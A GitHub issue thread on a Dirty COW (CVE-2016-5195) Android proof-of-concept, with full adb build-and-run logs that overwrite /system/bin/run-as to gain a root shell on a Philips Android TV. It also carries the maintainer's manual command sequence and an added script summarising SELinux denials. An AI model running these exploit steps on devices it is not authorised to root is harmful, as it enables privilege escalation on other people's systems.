timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Android TV Shell Hang #43

Closed uintdev closed 7 years ago

uintdev commented 7 years ago

Issue: After successfully exploiting, I am taken to the shell but if I press enter (doesn't matter what the command is), it kind of hangs. You could press the enter key as much as you want and it would go to the next line each time but it looks (visually) as if it's still waiting for output infinitely with the blinking cursor. Using CTRL+C is one way of getting out of the entire thing. I had tested the reboot command but that did nothing whatsoever. The actual unit was responsive the entire time. So nothing like kernel panics ended up happening (unlike half of the time with KingRoot).

System information:

Model: 40PUT6400/12 - Philips - Developed by TP Vision
Product ID: QM152E
Security Patch Date: 2016-07-01
Android Version: 5.1.1 (22 SDK)
CPU: Cortex-A17 (armeabi-v7a, 32 bit)
Kernel Version: 3.10.27 (build_ci@inblrlx047) (gcc version 4.8.2 20131014 (prerelease) (Linaro GCC 4.8-2013.10)) #1 SMP PREEMPT Fri Oct 7 11:45:11 IST 2016

MAKE TEST:

user@hostname:~/Desktop/CVE-2016-5195-master$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
100 KB/s (13784 bytes in 0.134s)
adb push test.sh /data/local/tmp/test.sh
11 KB/s (367 bytes in 0.031s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2016-12-30 19:22 test
-rwxrwxrwx shell    shell         367 2016-12-19 14:06 test.sh
-r--r--r-- shell    shell          18 2016-12-30 19:22 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0xb6eda000
[*] currently 0xb6eda000=72756f79
[*] madvise = 0xb6eda000 18
[*] madvise = 0 59449
[*] /proc/self/mem 93150 5175
[*] exploited 0xb6eda000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

MAKE ROOT:

user@hostname:~/Desktop/CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
111 KB/s (13784 bytes in 0.121s)
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
54 KB/s (5544 bytes in 0.100s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9444) differ

[*] size 5544
[*] mmap 0xb6e7d000
[*] currently 0xb6e7d000=464c457f
[*] madvise = 0xb6e7d000 5544
[*] madvise = 0 460
[*] /proc/self/mem 205128 37
[*] exploited 0xb6e7d000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x63c
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@philips_MT5593FHT_EU:/ #
timwr commented 7 years ago

Interesting. Do you get any SELinux avc: denied messages in adb logcat? E.g. adb logcat | grep avc

uintdev commented 7 years ago

It returns the following:

W/adbd    ( 4943): type=1400 audit(0.0:23): avc: denied { read } for name="selinux_version" dev="mmcblk0p7" ino=168006 scontext=u:r:adbd:s0 tcontext=u:object_r:security_file:s0 tclass=file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:24): avc: denied { getattr } for path="/dev/pts/0" dev="devpts" ino=3 scontext=u:r:runas:s0 tcontext=u:object_r:devpts:s0 tclass=chr_file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:25): avc: denied { use } for path="socket:[55996]" dev="sockfs" ino=55996 scontext=u:r:shell:s0 tcontext=u:r:runas:s0 tclass=fd permissive=0

SELinux strikes again..
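The three avc lines above are the kind of output `adb logcat | grep avc` produces. As an added example (not part of the timwr/CVE-2016-5195 repository or of either commenter's post), the POSIX shell script below turns such lines into audit2allow-style `allow` rules, so the blocked domain transition can be read off directly. The sample input is the three denials quoted in this issue plus one constructed non-avc line; the function names and the output format are this example's own choices.

```shell
#!/bin/sh
# Added example (not part of timwr/CVE-2016-5195): summarise SELinux
# "avc: denied" lines from `adb logcat` as audit2allow-style rules.
# The first three sample lines are copied from the issue above; the
# fourth is a constructed non-avc line that must be ignored.

SAMPLE_AVC='W/adbd    ( 4943): type=1400 audit(0.0:23): avc: denied { read } for name="selinux_version" dev="mmcblk0p7" ino=168006 scontext=u:r:adbd:s0 tcontext=u:object_r:security_file:s0 tclass=file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:24): avc: denied { getattr } for path="/dev/pts/0" dev="devpts" ino=3 scontext=u:r:runas:s0 tcontext=u:object_r:devpts:s0 tclass=chr_file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:25): avc: denied { use } for path="socket:[55996]" dev="sockfs" ino=55996 scontext=u:r:shell:s0 tcontext=u:r:runas:s0 tclass=fd permissive=0
I/run-as  ( 4950): constructed unrelated line that must be ignored'

# avc_to_rules: read logcat on stdin and print one line of the form
#   allow <source domain> <target type>:<class> { <permission> };
# per distinct enforced denial. Lines logged with permissive=1 were
# not actually blocked by the kernel, so they are skipped.
avc_to_rules() {
    awk '
    /avc: denied/ && /permissive=0/ {
        perm = $0
        sub(/.*avc: denied [{] */, "", perm)   # keep text after "{ "
        sub(/ *[}].*/, "", perm)              # cut at the closing "}"

        s = $0; sub(/.*scontext=/, "", s); sub(/ .*/, "", s)
        split(s, sa, ":"); sdom = sa[3]       # u:r:shell:s0 -> shell

        t = $0; sub(/.*tcontext=/, "", t); sub(/ .*/, "", t)
        split(t, ta, ":"); ttype = ta[3]      # u:object_r:devpts:s0 -> devpts

        c = $0; sub(/.*tclass=/, "", c); sub(/ .*/, "", c)

        key = sdom SUBSEP ttype SUBSEP c SUBSEP perm
        if (!(key in seen)) {                 # collapse repeated denials
            seen[key] = 1
            printf "allow %s %s:%s { %s };\n", sdom, ttype, c, perm
        }
    }'
}

# avc_rule_count: number of distinct enforced denials on stdin.
avc_rule_count() {
    avc_to_rules | grep -c '^allow '
}

# Stand-alone run: print the rules derived from the sample lines.
printf '%s\n' "$SAMPLE_AVC" | avc_to_rules
```

Run it as `adb logcat -d | sh avc_rules.sh`-style input on stdin (here the sample is fed through `printf`). For the lines in this issue it prints three rules; the third, `allow shell runas:fd { use };`, is the denial in which a process already in the `shell` domain is refused use of a file descriptor inherited from the `runas` domain, which is the denial reported here together with the hanging shell. The rules are a reading aid for the denials, not something to compile into the device policy.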

timwr commented 7 years ago

Sorry for the delay. I guess you could try what is outlined here: https://github.com/timwr/CVE-2016-5195/issues/47 e.g. don't use the Makefile and just run the commands manually:

adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
adb shell
/system/bin/run-as
uintdev commented 7 years ago

That did the trick. Now it is in the same situation as issue #47 (context is 'u:r:shell:s0'). That's progress.